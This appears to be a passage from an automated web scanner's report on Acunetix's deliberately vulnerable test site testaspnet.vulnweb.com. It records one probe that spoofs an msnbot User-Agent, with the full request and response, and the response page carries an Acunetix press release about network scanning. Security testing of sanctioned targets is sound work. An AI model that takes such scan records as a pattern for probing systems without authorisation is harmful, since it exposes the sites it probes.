uY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi" /> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP1p3RBAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNw4dcQo8tH//aNq1Q9scKgXRi5G" /> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" bgcolor="#E6DCCF"> <tr><td colspan="7" bgcolor="#E6B873"><font size="2"><table class="Calendar" cellspacing="0" border="0" width="100%"> <tr><td width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></b></font></td><td align="center" width="70%"><font size="2"><b>December 2022</b></font></td><td align="right" width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></b></font></td></tr> </table></font></td></tr><tr><th align="center" abbr="Sunday" scope="col"><font size="2">Sun</font></th><th align="center" abbr="Monday" scope="col"><font size="2">Mon</font></th><th align="center" abbr="Tuesday" scope="col"><font size="2">Tue</font></th><th align="center" abbr="Wednesday" scope="col"><font size="2">Wed</font></th><th align="center" abbr="Thursday" scope="col"><font size="2">Thu</font></th><th align="center" abbr="Friday" scope="col"><font size="2">Fri</font></th><th align="center" abbr="Saturday" scope="col"><font size="2">Sat</font></th></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></font></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html
Method	GET
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 450 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:34 GMT Content-Length: 30673
Response Body - size: 30,673 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2&NewsAd=ads%2fdef.html" id="Form1"> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAg